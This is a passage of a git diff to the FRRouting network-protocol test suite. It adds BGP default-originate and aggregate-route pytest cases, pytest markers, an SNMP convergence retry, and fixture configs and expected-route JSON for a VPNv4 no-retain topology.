+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before removing redisctribute static ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("After removing default originate the route uptime should get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ write_test_footer(tc_name)
+
+
+def test_verify_bgp_default_originate_with_aggregate_summary_p1(request):
+ """
+ Summary: "Verify default-originate route with aggregate summary command"
+ """
+ tgen = get_topogen()
+ global BGP_CONVERGENCE
+ tc_name = request.node.name
+ write_test_header(tc_name)
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+ reset_config_on_routers(tgen)
+ if BGP_CONVERGENCE != True:
+ pytest.skip("skipped because of BGP Convergence failure")
+
+ step("After changing the BGP AS Path Verify the BGP Convergence")
+ BGP_CONVERGENCE = verify_bgp_convergence(tgen, topo)
+ assert BGP_CONVERGENCE is True, "setup_module :Failed \n Error: {}".format(
+ BGP_CONVERGENCE
+ )
+
+ step("Configure default-originate on R1 IPv4 and IPv6 BGP session link-1 only")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step(
+ "Verify IPv4/IPv6 default originate routes present on R2 nexthop as link-1,on R2"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Configure 5 static route for IPv4 and IPv6 on R0")
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {
+ "network": [NETWORK1_1[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_2[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_3[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_4[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_5[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Before configuring the aggregate route taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Configure aggregate summary command for IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ raw_config = {
+ "r1": {
+ "raw_config": [
+ "router bgp {}".format(local_as),
+ "address-family ipv4 unicast",
+ "aggregate-address {} summary-only".format("0.0.0.0/0 "),
+ "exit-address-family",
+ "address-family ipv6 unicast",
+ "aggregate-address {} summary-only".format("0::0/0"),
+ "exit-address-family",
+ ]
+ }
+ }
+ result = apply_raw_config(tgen, raw_config)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step(
+ "verify that no change on IPv4/IPv6 default-originate route advertised from link1 0.0.0.0/0 and 0::0/0 route also get advertised from link-2 on R2"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After configuring the aggregate route taking uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After Configuring the aggregate route uptime should get reset for link-1 learn route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Before removing default originate taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove default originate from R1 link -1 IPv4 and IPv6 address family")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step(
+ "verify that no change on IPv4/IPv6 default-originate route advertised from link1 0.0.0.0/0 and 0::0/0 route also get advertised from link-2 on R2"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After removing default origin taking uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After removing the default-originate uptime should get reset for link-1 learn route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Before Configuring default origin taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure default-originate on R1 link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("After Configuring default originate taking uptime snapshot")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After Configuring the default-originate uptime should get reset for link-1 learn route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Before removing aggregate -summary command taking the uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("remove aggregate summary command for IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ raw_config = {
+ "r1": {
+ "raw_config": [
+ "router bgp {}".format(local_as),
+ "address-family ipv4 unicast",
+ "no aggregate-address {} summary-only".format("0.0.0.0/0"),
+ "exit-address-family",
+ "address-family ipv6 unicast",
+ "no aggregate-address {} summary-only".format("0::0/0"),
+ "exit-address-family",
+ ]
+ }
+ }
+ result = apply_raw_config(tgen, raw_config)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify Default-originate IPv4/IPv6 route learn on link-1 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify 0.0.0.0/0 and 0::0/0 route get removed from link-2 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After removing aggregate -summary command taking the uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("After removing aggregate command uptime should get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ write_test_footer(tc_name)
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
index ee71ae16e0..814272374a 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
@@ -82,6 +82,8 @@ from lib.common_config import (
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
index a9987a8f96..8e6f930633 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
@@ -81,6 +81,8 @@ from lib.common_config import (
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
index 95511568c6..9e5250406b 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
@@ -68,6 +68,7 @@ from lib.common_config import (
check_router_status,
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
@@ -1138,6 +1139,7 @@ def test_verify_default_originate_after_BGP_and_FRR_restart_p2(request):
write_test_footer(tc_name)
+
def test_verify_default_originate_after_shut_no_shut_bgp_neighbor_p1(request):
"""
Summary: "Verify default-originate route after shut/no shut and clear BGP neighbor "
@@ -2532,6 +2534,7 @@ def test_verify_default_originate_after_shut_no_shut_bgp_neighbor_p1(request):
write_test_footer(tc_name)
+
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py b/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
index d330a04439..fa5164fb71 100644
--- a/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
+++ b/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
@@ -73,6 +73,8 @@ from lib.common_config import (
delete_route_maps,
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py b/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
index 272a7fe291..9e3a3b5660 100644
--- a/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
+++ b/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
@@ -74,6 +74,8 @@ CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Required to instantiate the topology builder class.
# pylint: disable=C0413
diff --git a/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf b/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
index 9e581a7be7..0a283c06d5 100644
--- a/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
+++ b/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
@@ -5,7 +5,5 @@ interface lo
interface r1-eth0
ip address 192.168.255.1/24
!
-ip route 192.168.13.0./24 Null0
-!
ip forwarding
!
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
index 68436177d8..9f01287c91 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
@@ -56,6 +56,9 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
index 1d424caa30..48f308e316 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
@@ -55,6 +55,8 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
index fc2d2364c6..4105c3fe63 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
@@ -52,6 +52,8 @@ from lib.bgp import create_router_bgp, verify_bgp_convergence, verify_bgp_rib
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
index 862cae42e9..a9e6d21b8d 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
@@ -58,9 +58,10 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
-
# Global variables
NETWORK = {
"ipv4": [
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
index 1a91257f06..9a0fc44175 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
@@ -54,6 +54,7 @@ from lib.topojson import build_config_from_json
# Global variables
topo = None
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Global variables
NETWORK_CMD_IP = "1.0.1.17/32"
diff --git a/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py b/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
index d612ad2c94..bc53dfb469 100755
--- a/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
+++ b/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
@@ -38,6 +38,7 @@ sys.path.append(os.path.join(CWD, "../"))
# Import topogen and topotest helpers
from lib.topogen import Topogen, TopoRouter, get_topogen
from lib.snmptest import SnmpTester
+from lib import topotest
# Required to instantiate the topology builder class.
@@ -239,10 +240,18 @@ def test_pe1_converge_evpn():
tgen = get_topogen()
r1 = tgen.gears["r1"]
- r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
+ def _convergence():
+ r1 = tgen.gears["r1"]
+ r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
+
+ return r1_snmp.test_oid("bgpVersion", "10")
+
+ _, result = topotest.run_and_expect(_convergence, True, count=20, wait=1)
assertmsg = "BGP SNMP does not seem to be running"
- assert r1_snmp.test_oid("bgpVersion", "10"), assertmsg
+ assert result, assertmsg
+
+ r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
count = 0
passed = False
while count < 125:
diff --git a/tests/topotests/bgp_vpnv4_noretain/__init__.py b/tests/topotests/bgp_vpnv4_noretain/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/__init__.py
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf b/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf
new file mode 100644
index 0000000000..3d8773b8bf
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf
@@ -0,0 +1,24 @@
+router bgp 65500
+ bgp router-id 1.1.1.1
+ neighbor 10.125.0.2 remote-as 65500
+ address-family ipv4 unicast
+ no neighbor 10.125.0.2 activate
+ exit-address-family
+ address-family ipv4 vpn
+ neighbor 10.125.0.2 activate
+ no bgp retain route-target all
+ exit-address-family
+!
+router bgp 65500 vrf vrf1
+ bgp router-id 1.1.1.1
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 101
+ rd vpn export 444:1
+ rt vpn import 51:100 52:100
+ rt vpn export 51:100
+ export vpn
+ import vpn
+ exit-address-family
+!
+
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json
new file mode 100644
index 0000000000..903c4603c5
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json
@@ -0,0 +1,69 @@
+{
+ "vrfId":0,
+ "vrfName":"default",
+ "tableVersion":1,
+ "routerId":"1.1.1.1",
+ "defaultLocPrf":100,
+ "localAS":65500,
+ "routes":{
+ "routeDistinguishers":{
+ "444:1":{
+ "10.201.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"external",
+ "prefix":"10.201.0.0",
+ "prefixLen":24,
+ "network":"10.201.0.0\/24",
+ "version":1,
+ "metric":0,
+ "weight":32768,
+ "peerId":"(unspec)",
+ "path":"",
+ "origin":"incomplete",
+ "announceNexthopSelf":true,
+ "nhVrfName":"vrf1",
+ "nexthops":[
+ {
+ "ip":"0.0.0.0",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:2":{
+ "10.200.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.200.0.0",
+ "prefixLen":24,
+ "network":"10.200.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:3":{
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json
new file mode 100644
index 0000000000..3cc0b4a5f5
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json
@@ -0,0 +1,94 @@
+{
+ "vrfId":0,
+ "vrfName":"default",
+ "tableVersion":1,
+ "routerId":"1.1.1.1",
+ "defaultLocPrf":100,
+ "localAS":65500,
+ "routes":{
+ "routeDistinguishers":{
+ "444:1":{
+ "10.201.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"external",
+ "prefix":"10.201.0.0",
+ "prefixLen":24,
+ "network":"10.201.0.0\/24",
+ "version":1,
+ "metric":0,
+ "weight":32768,
+ "peerId":"(unspec)",
+ "path":"",
+ "origin":"incomplete",
+ "announceNexthopSelf":true,
+ "nhVrfName":"vrf1",
+ "nexthops":[
+ {
+ "ip":"0.0.0.0",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:2":{
+ "10.200.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.200.0.0",
+ "prefixLen":24,
+ "network":"10.200.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:3":{
+ "10.210.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.210.0.0",
+ "prefixLen":24,
+ "network":"10.210.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf b/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf
new file mode 100644
index 0000000000..6f5cb6ec68
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf
@@ -0,0 +1,14 @@
+interface r1-eth0
+ ip router isis 1
+ isis circuit-type level-1
+!
+interface lo
+ ip router isis 1
+ isis passive
+!
+router isis 1
+ is-type level-1
+ net 49.0002.0000.1994.00
+ segment-routing on
+ segment-routing prefix 1.1.1.1/32 index 11
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf b/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf
new file mode 100644
index 0000000000..5b8b1e8ffb
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf
@@ -0,0 +1,13 @@
+log stdout
+interface lo
+ ip address 1.1.1.1/32
+!
+interface r1-gre0
+ ip address 192.168.0.1/24
+!
+interface r1-eth1 vrf vrf1
+ ip address 10.201.0.1/24
+!
+interface r1-eth0
+ ip address 10.125.0.1/24
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf b/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf
new file mode 100644
index 0000000000..235fb31177
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf
@@ -0,0 +1,35 @@
+router bgp 65500
+ bgp router-id 2.2.2.2
+ neighbor 10.125.0.1 remote-as 65500
+ address-family ipv4 unicast
+ no neighbor 10.125.0.1 activate
+ exit-address-family
+ address-family ipv4 vpn
+ neighbor 10.125.0.1 activate
+ no bgp retain route-target all
+ exit-address-family
+!
+router bgp 65500 vrf vrf1
+ bgp router-id 2.2.2.2
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 102
+ rd vpn export 444:2
+ rt vpn import 53:100 52:100 51:100
+ rt vpn export 52:100
+ export vpn
+ import vpn
+ exit-address-family
+!
+router bgp 65500 vrf vrf2
+ bgp router-id 2.2.2.2
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 102
+ rd vpn export 444:3
+ rt vpn both 53:100 52:100 51:100
